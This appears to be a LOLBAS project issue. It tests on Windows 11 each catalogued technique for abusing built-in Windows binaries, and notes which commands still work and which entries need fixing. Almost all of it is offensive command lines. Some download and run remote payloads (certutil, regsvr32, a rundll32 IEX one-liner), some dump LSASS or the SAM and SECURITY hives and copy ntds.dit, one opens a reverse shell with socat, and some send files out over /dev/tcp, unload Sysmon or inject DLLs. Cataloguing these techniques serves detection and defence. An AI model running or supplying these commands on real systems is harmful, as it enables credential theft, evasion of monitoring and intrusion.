LOLBAS
Windows 11 sprint
Using 7b208e8021a935b39edd58cc2996595c0135f722 as a base, I have checked all LOLBAS entries on a default installation on Windows 11 (21H2). As you might expect, most entries that worked on Windows 10 still work on Windows 11. Whilst going over all entries, a couple of issues were found - see the last two columns of the below table.
Please scroll to the right to see the outcomes ➡️ ➡️ ➡️
| Entry | Command | Works on Windows 11? | Needs changing? | Comment |
|---|---|---|---|---|
| Shdocvw.dll | `rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"` | ✔️ | | |
| Url.dll | `rundll32.exe url.dll,OpenURL "C:\test\calc.hta"` | ✔️ | | |
| Url.dll | `rundll32.exe url.dll,OpenURL "C:\test\calc.url"` | ✔️ | ⚠️ | Opens Edge, requires user interaction to open calc |
| Url.dll | `rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e` | ✔️ | | |
| Url.dll | `rundll32.exe url.dll,FileProtocolHandler calc.exe` | ✔️ | | |
| Url.dll | `rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e` | ✔️ | | |
| Url.dll | `rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta` | ✔️ | | |
| Zipfldr.dll | `rundll32.exe zipfldr.dll,RouteTheCall calc.exe` | ✔️ | | |
| Zipfldr.dll | `rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e` | ✔️ | | |
| Advpack.dll | `rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,` | ✔️ | | |
| Advpack.dll | `rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,,1,` | ✔️ | ⚠️ | Admin required |
| Advpack.dll | `rundll32.exe advpack.dll,RegisterOCX test.dll` | ✔️ | | |
| Advpack.dll | `rundll32.exe advpack.dll,RegisterOCX calc.exe` | ✔️ | | |
| Advpack.dll | `rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"` | ✔️ | | |
| Setupapi.dll | `rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf` | ✔️ | | |
| Setupapi.dll | `rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf` | ✔️ | | |
| Ieadvpack.dll | `rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,` | ✔️ | | |
| Ieadvpack.dll | `rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,,1,` | ✔️ | ⚠️ | Admin required |
| Ieadvpack.dll | `rundll32.exe ieadvpack.dll,RegisterOCX test.dll` | ✔️ | | |
| Ieadvpack.dll | `rundll32.exe ieadvpack.dll,RegisterOCX calc.exe` | ✔️ | | |
| Ieadvpack.dll | `rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe"` | ✔️ | | |
| Comsvcs.dll | `rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"` | ✔️ | ⚠️ | Requires PowerShell for some reason? Only worked for me when I prefixed with `powershell /c …` |
| Mshtml.dll | `rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"` | ✔️ | | Requires GUI interaction to open/load HTA |
| Shell32.dll | `rundll32.exe shell32.dll,Control_RunDLL payload.dll` | ✔️ | ⚠️ | Full path (e.g. `c:\path\to\payload`) required |
| Shell32.dll | `rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe` | ✔️ | | |
| Shell32.dll | `rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"` | ✔️ | | |
| Syssetup.dll | `rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf` | ✔️ | | |
| Syssetup.dll | `rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf` | ✔️ | | |
| Ieaframe.dll | `rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"` | ✔️ | | |
| Pcwutl.dll | `rundll32.exe pcwutl.dll,LaunchApplication calc.exe` | ✔️ | | |
| Dfshim.dll | `rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo` | Not tested | | |
| CL_LoadAssembly.ps1 | `”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()` | ✔️ | | Redundant quote at start of command; `-ep bypass` needed; Requires .NET DLL |
| CL_Mutexverifiers.ps1 | `. C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1 \nrunAfterCancelProcess calc.ps1` | Not tested | | May be Windows 10 only? Could not find file. |
| winrm.vbs | `winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985` | ✔️ | | |
| winrm.vbs | `winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985` | ✔️ | ⚠️ | Two commands; former requires admin |
| winrm.vbs | `%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty` | ✔️ | ⚠️ | Description update needed – doesn't involve XSL? |
| Pubprn.vbs | `pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct` | ❌ | | Error |
| Manage-bde.wsf | `set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf` | ✔️ | | |
| Manage-bde.wsf | `copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf` | ✔️ | | |
| Syncappvpublishingserver.vbs | `SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') \| IEX"` | ❌ | | Nothing happens. |
| UtilityFunctions.ps1 | `powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”` | ✔️ | ⚠️ | `-ep bypass` needed |
| Pester.bat | `Pester.bat [/help\|?\|-?\|/?] "$null; notepad"` | ✔️ | | |
| CL_Invocation.ps1 | `. C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke <executable> [args]` | Not tested | | May be Windows 10 only? Could not find file. |
| Mmc.exe | `mmc.exe -Embedding c:\path\to\test.msc` | ❌ | | Not sure why – seems to interpret GUID as URL. @bohops to the rescue? |
| Mmc.exe | `mmc.exe gpedit.msc` | ✔️ | | |
| CertOC.exe | `certoc.exe -LoadDLL "C:\test\calc.dll"` | Out of scope | | Windows Server only. |
| CertOC.exe | `certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1` | Out of scope | | Windows Server only. |
| At.exe | `C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe` | ❌ | | Deprecated – not accepted |
| AppInstaller.exe | `start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw` | ✔️ | | |
| Makecab.exe | `makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab` | ✔️ | | |
| Makecab.exe | `makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab` | ✔️ | | |
| Makecab.exe | `makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab` | ✔️ | | |
| Bash.exe | `bash.exe -c calc.exe` | Out of scope | | Doesn't come out of the box |
| Bash.exe | `bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"` | Out of scope | | Doesn't come out of the box |
| Bash.exe | `bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'` | Out of scope | | Doesn't come out of the box |
| Bash.exe | `bash.exe -c calc.exe` | Out of scope | | Doesn't come out of the box |
| Odbcconf.exe | `odbcconf -f file.rsp` | ✔️ | ⚠️ | Typo 'Playloads' |
| Odbcconf.exe | `odbcconf /a {REGSVR c:\test\test.dll}` | ✔️ | | |
| Ieexec.exe | `ieexec.exe http://x.x.x.x:8080/bypass.exe` | ❌ | | File not present |
| Ieexec.exe | `ieexec.exe http://x.x.x.x:8080/bypass.exe` | ❌ | | File not present |
| ConfigSecurityPolicy.exe | `ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile` | ❌ | | Error message, does not reach out to server |
| Findstr.exe | `findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe` | ✔️ | | |
| Findstr.exe | `findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe` | ✔️ | | |
| Findstr.exe | `findstr /S /I cpassword \\sysvol\policies\*.xml` | ✔️ | | |
| Findstr.exe | `findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe` | ✔️ | | |
| Wsreset.exe | `wsreset.exe` | ✔️ | | |
| cmdl32.exe | `cmdl32 /vpn /lan %cd%\config` | ✔️ | | |
| Cmstp.exe | `cmstp.exe /ni /s c:\cmstp\CorpVPN.inf` | ✔️ | | |
| Cmstp.exe | `cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf` | ❌ | | |
| Xwizard.exe | `xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}` | ✔️ | | |
| Xwizard.exe | `xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}` | ✔️ | | |
| Xwizard.exe | `xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM` | ✔️ | ⚠️ | Should be clearer about location (`AppData/Local/Microsoft/Windows/InetCache/IE/{random}` etc.) |
| Rasautou.exe | `rasautou -d powershell.dll -p powershell -a a -e e` | ❌ | | Removed in Windows 10, as expected |
| Regsvcs.exe | `regsvcs.exe AllTheThingsx64.dll` | ✔️ | ⚠️ | Works without admin; Wrong path! |
| Regsvcs.exe | `regsvcs.exe AllTheThingsx64.dll` | ✔️ | ⚠️ | Works without admin; Wrong path! |
| Msdt.exe | `msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE` | ✔️ | | |
| Msdt.exe | `msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE` | ✔️ | | |
| Pktmon.exe | `pktmon.exe start --etw` | ✔️ | | |
| Pktmon.exe | `pktmon.exe filter add -p 445` | ✔️ | | |
| Microsoft.Workflow.Compiler.exe | `Microsoft.Workflow.Compiler.exe tests.xml results.xml` | ✔️ | | |
| Microsoft.Workflow.Compiler.exe | `Microsoft.Workflow.Compiler.exe tests.txt results.txt` | ✔️ | | |
| Microsoft.Workflow.Compiler.exe | `Microsoft.Workflow.Compiler.exe tests.txt results.txt` | ✔️ | | |
| PrintBrm.exe | `PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip` | ✔️ | | Is a specially-formatted zip |
| PrintBrm.exe | `PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder` | ✔️ | | Requires a specially-formatted zip |
| Regsvr32.exe | `regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll` | ✔️ | | |
| Regsvr32.exe | `regsvr32.exe /s /u /i:file.sct scrobj.dll` | ✔️ | | |
| Regsvr32.exe | `regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll` | ✔️ | | |
| Regsvr32.exe | `regsvr32.exe /s /u /i:file.sct scrobj.dll` | ✔️ | | |
| MpCmdRun.exe | `MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe` | ❌ | | Patched in previous version of Defender |
| MpCmdRun.exe | `copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe` | ❌ | | Patched in previous version of Defender |
| MpCmdRun.exe | `MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe` | ❌ | | Patched in previous version of Defender |
| Msconfig.exe | `Msconfig.exe -5` | ❌ | | Described XML not found |
| Hh.exe | `HH.exe http://some.url/script.ps1` | ✔️ | ⚠️ | Wrong path; Requires user interaction to open/load PS1 file |
| Hh.exe | `HH.exe c:\windows\system32\calc.exe` | ✔️ | ⚠️ | Wrong path; Requires user interaction to open calc |
| Cmd.exe | `cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat` | ✔️ | | |
| Cmd.exe | `cmd.exe - < fakefile.doc:payload.bat` | ✔️ | | |
| DataSvcUtil.exe | `DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile` | ❌ | ⚠️ | Query string not allowed in URL, so `?encodedfile` would be removed. But even then I couldn't get it to work - requires some special server response? |
| Control.exe | `control.exe c:\windows\tasks\file.txt:evil.dll` | ✔️ | | |
| Certutil.exe | `certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe` | ✔️ | | |
| Certutil.exe | `certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe` | ✔️ | | |
| Certutil.exe | `certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt` | ✔️ | | |
| Certutil.exe | `certutil -encode inputFileName encodedOutputFileName` | ✔️ | | |
| Certutil.exe | `certutil -decode encodedInputFileName decodedOutputFileName` | ✔️ | | |
| Certutil.exe | `certutil --decodehex encoded_hexadecimal_InputFileName` | ✔️ | | |
| Runonce.exe | `Runonce.exe /AlternateShellStartup` | ✔️ | | |
| Msbuild.exe | `msbuild.exe pshell.xml` | ✔️ | | |
| Msbuild.exe | `msbuild.exe project.csproj` | ✔️ | | |
| Msbuild.exe | `msbuild.exe @sample.rsp` | ❌ | ⚠️ | I think a comment in #165 was misunderstood – RSPs can help to evade command-line-based detection, but cannot be used on their own to achieve e.g. execution |
| Msbuild.exe | `msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo` | ✔️ | | |
| Msbuild.exe | `msbuild.exe project.proj` | ✔️ | | |
| Cmdkey.exe | `cmdkey /list` | ✔️ | | |
| Regini.exe | `regini.exe newfile.txt:hidden.ini` | ✔️ | | |
| Rpcping.exe | `rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM` | ✔️ | | |
| Rpcping.exe | `rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM` | ✔️ | | |
| GfxDownloadWrapper.exe | `C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"` | Out of scope | | See issue #173 |
| Schtasks.exe | `schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe` | ✔️ | | |
| Schtasks.exe | `schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily` | ✔️ | | |
| SettingSyncHost.exe | `SettingSyncHost -LoadAndRunDiagScript anything` | Out of scope | | |
| SettingSyncHost.exe | `SettingSyncHost -LoadAndRunDiagScriptNoCab anything` | Out of scope | | |
| IMEWDBLD.exe | `C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw` | ✔️ | | |
| Jsc.exe | `jsc.exe scriptfile.js` | ✔️ | | |
| Jsc.exe | `jsc.exe /t:library Library.js` | ✔️ | | |
| wuauclt.exe | `wuauclt.exe /UpdateDeploymentProvider <Full_Path_To_DLL> /RunHandlerComServer` | ❌ | ⚠️ | Maybe special format/entrypoints required? Also, `<Full_Path_To_DLL>` is rendered as an HTML tag on the website - should double check escaping again. |
| CertReq.exe | `CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt` | ✔️ | | |
| CertReq.exe | `CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal` | ✔️ | | |
| Wab.exe | `wab.exe` | ✔️ | | |
| Infdefaultinstall.exe | `InfDefaultInstall.exe Infdefaultinstall.inf` | ✔️ | ⚠️ | Admin required |
| Csc.exe | `csc.exe -out:My.exe File.cs` | ✔️ | | |
| Csc.exe | `csc -target:library File.cs` | ✔️ | | |
| Atbroker.exe | `ATBroker.exe /start malware` | ✔️ | | |
| Aspnet_Compiler.exe | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u` | ✔️ | | |
| Register-cimprovider.exe | `Register-cimprovider -path "C:\folder\evil.dll"` | ✔️ | | |
| Bitsadmin.exe | `bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1` | ✔️ | ⚠️ | Works* but different command: `bitsadmin /transfer debjob /download /priority normal http://localhost:8000/runme.txt c:\windows\temp\test.txt`; Ampersands also missing. |
| Bitsadmin.exe | `bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1` | ✔️ | ⚠️ | Different command used: `bitsadmin /transfer debjob /download /priority normal http://localhost:8000/runme.txt c:\windows\temp\test.txt` |
| Bitsadmin.exe | `bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset` | ❌ | | Ampersands also missing. |
| Bitsadmin.exe | `bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset` | ❌ | | |
| Netsh.exe | `netsh.exe add helper C:\Users\User\file.dll` | ✔️ | ⚠️ | Admin required |
| Msiexec.exe | `msiexec /quiet /i cmd.msi` | ✔️ | | |
| Msiexec.exe | `msiexec /q /i http://192.168.100.3/tmp/cmd.png` | ✔️ | | Special Class: DLLRegisterServer |
| Msiexec.exe | `msiexec /y "C:\folder\evil.dll"` | ✔️ | | Special Class: DLLRegisterServer |
| Msiexec.exe | `msiexec /z "C:\folder\evil.dll"` | ✔️ | | Special Class: DLLRegisterServer |
| Psr.exe | `psr.exe /start /output D:\test.zip /sc 1 /gui 0` | ❌ | | GUI doesn't seem to work either |
| Ilasm.exe | `ilasm.exe C:\public\test.txt /exe` | ✔️ | | |
| Ilasm.exe | `ilasm.exe C:\public\test.txt /dll` | ✔️ | | |
| Gpscript.exe | `Gpscript /logon` | ✔️ | | |
| Gpscript.exe | `Gpscript /startup` | ✔️ | | |
| Sc.exe | `sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice` | ✔️ | ⚠️ | Incorrect slash |
| Sc.exe | `sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>` | ✔️ | | |
| Reg.exe | `reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg` | ✔️ | | |
| Reg.exe | `reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak` | ✔️ | | |
| Cscript.exe | `cscript c:\ads\file.txt:script.vbs` | ✔️ | ⚠️ | Requires `//e:vbscript` |
| Scriptrunner.exe | `Scriptrunner.exe -appvscript calc.exe` | ✔️ | | |
| Scriptrunner.exe | `ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"` | ✔️ | | GUI interaction required |
| Finger.exe | `finger [email protected] \| more +2 \| cmd` | ✔️ | | |
| Dllhost.exe | `dllhost.exe /Processid:{CLSID}` | ❌ | | |
| Mavinject.exe | `MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll` | ✔️ | | |
| Mavinject.exe | `Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"` | ✔️ | | |
| Pcalua.exe | `pcalua.exe -a calc.exe` | ✔️ | | |
| Pcalua.exe | `pcalua.exe -a \\server\payload.dll` | ❌ | | May require special class? |
| Pcalua.exe | `pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java` | ✔️ | | |
| OfflineScannerShell.exe | `OfflineScannerShell` | ✔️ | ⚠️ | Special structure required. However, isn't this more DLL Sideloading than a lolbin? |
| Pcwrun.exe | `Pcwrun.exe c:\temp\beacon.exe` | ✔️ | ⚠️ | Requires GUI interaction |
| Tttracer.exe | `tttracer.exe C:\windows\system32\calc.exe` | ✔️ | | |
| Tttracer.exe | `TTTracer.exe -dumpFull -attach pid` | ✔️ | | |
| Regasm.exe | `regasm.exe AllTheThingsx64.dll` | ✔️ | | Requires RegisterClass function |
| Regasm.exe | `regasm.exe /U AllTheThingsx64.dll` | ✔️ | | Requires RegisterClass function |
| Extrac32.exe | `extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe` | ✔️ | | |
| Extrac32.exe | `extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe` | ✔️ | | |
| Extrac32.exe | `extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt` | ✔️ | | |
| Extrac32.exe | `extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe` | ✔️ | | |
| Dnscmd.exe | `dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll` | Out of scope | | Windows Server only. |
| Print.exe | `print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe` | ✔️ | | |
| Print.exe | `print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe` | ✔️ | | |
| Print.exe | `print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe` | ✔️ | | |
| Dfsvc.exe | `rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo` | ✔️ | | User interaction required. |
| Diskshadow.exe | `diskshadow.exe /s c:\test\diskshadow.txt` | Out of scope | | Windows Server only. |
| Diskshadow.exe | `diskshadow> exec calc.exe` | Out of scope | | Windows Server only. |
| fltMC.exe | `fltMC.exe unload SysmonDrv` | ✔️ | | |
| Expand.exe | `expand \\webdav\folder\file.bat c:\ADS\file.bat` | ✔️ | | |
| Expand.exe | `expand c:\ADS\file1.bat c:\ADS\file2.bat` | ✔️ | | |
| Expand.exe | `expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat` | ✔️ | | |
| Esentutl.exe | `esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o` | ✔️ | | |
| Esentutl.exe | `esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o` | ✔️ | | |
| Esentutl.exe | `esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o` | ✔️ | | |
| Esentutl.exe | `esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o` | ✔️ | | |
| Esentutl.exe | `esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o` | ✔️ | | |
| Esentutl.exe | `esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit` | ✔️ | | |
| Stordiag.exe | `stordiag.exe` | ✔️ | ⚠️ | Requires moving – not a lolbin? |
| SyncAppvPublishingServer.exe | `SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') \| IEX"` | ❌ | | Nothing happens |
| Wmic.exe | `wmic.exe process call create "c:\ads\file.txt:program.exe"` | ✔️ | | |
| Wmic.exe | `wmic.exe process call create calc` | ✔️ | | |
| Wmic.exe | `wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"` | ✔️ | ⚠️ | Just one of the many examples of what process call create can do - the calc example above should suffice, I'd remove this one |
| Wmic.exe | `wmic.exe /node:"192.168.0.1" process call create "evil.exe"` | ✔️ | | |
| Wmic.exe | `wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"` | ❌ | ⚠️ | Just one of the many examples of what process call create can do - the calc example above should suffice, I'd remove this one |
| Wmic.exe | `wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"` | ❌ | ⚠️ | Just one of the many examples of what process call create can do - the calc example above should suffice, I'd remove this one |
| Wmic.exe | `wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"` | ✔️ | | |
| Wmic.exe | `wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"` | ✔️ | | |
| OneDriveStandaloneUpdater.exe | `OneDriveStandaloneUpdater` | Not tested | | Could not be located (possibly not created due to having run 'O&O ShutUp10++' on my VM) |
| Forfiles.exe | `forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe` | ✔️ | | |
| Forfiles.exe | `forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"` | ✔️ | | |
| Diantz.exe | `diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab` | Out of scope | | Windows Server only. |
| Diantz.exe | `diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab` | Out of scope | | Windows Server only. |
| Desktopimgdownldr.exe | `set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr` | ✔️ | | |
| Wscript.exe | `wscript c:\ads\file.txt:script.vbs` | ✔️ | | |
| Wscript.exe | `echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js` | ✔️ | ⚠️ | Requires `//e:vbscript` |
| Ie4uinit.exe | `ie4uinit.exe -BaseSettings` | ✔️ | | |
| Verclsid.exe | `verclsid.exe /S /C {CLSID}` | ✔️ | | |
| Ttdinject.exe | `TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"` | ✔️ | | |
| Ttdinject.exe | `ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"` | ❌ | | But previous one works so not an issue |
| Regedit.exe | `regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey` | ✔️ | ⚠️ | Wrong path |
| Regedit.exe | `regedit C:\ads\file.txt:regfile.reg` | ✔️ | ⚠️ | Wrong path |
| Eventvwr.exe | `eventvwr.exe` | ❌ | | No longer working |
| vbc.exe | `vbc.exe /target:exe c:\temp\vbs\run.vb` | ✔️ | | |
| vbc.exe | `vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb` | ✔️ | ⚠️ | Contains template metadata |
| Explorer.exe | `explorer.exe /root,"C:\Windows\System32\calc.exe"` | ✔️ | | |
| Explorer.exe | `explorer.exe C:\Windows\System32\notepad.exe` | ✔️ | | |
| Installutil.exe | `InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll` | ✔️ | | Requires .NET DLL with special format |
| Installutil.exe | `InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll` | ✔️ | | Requires .NET DLL with special format |
| Extexport.exe | `Extexport.exe c:\test foo bar` | ✔️ | | |
| Rundll32.exe | `rundll32.exe AllTheThingsx64,EntryPoint` | ✔️ | | |
| Rundll32.exe | `rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint` | ✔️ | | |
| Rundll32.exe | `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"` | ✔️ | ⚠️ | `)` missing |
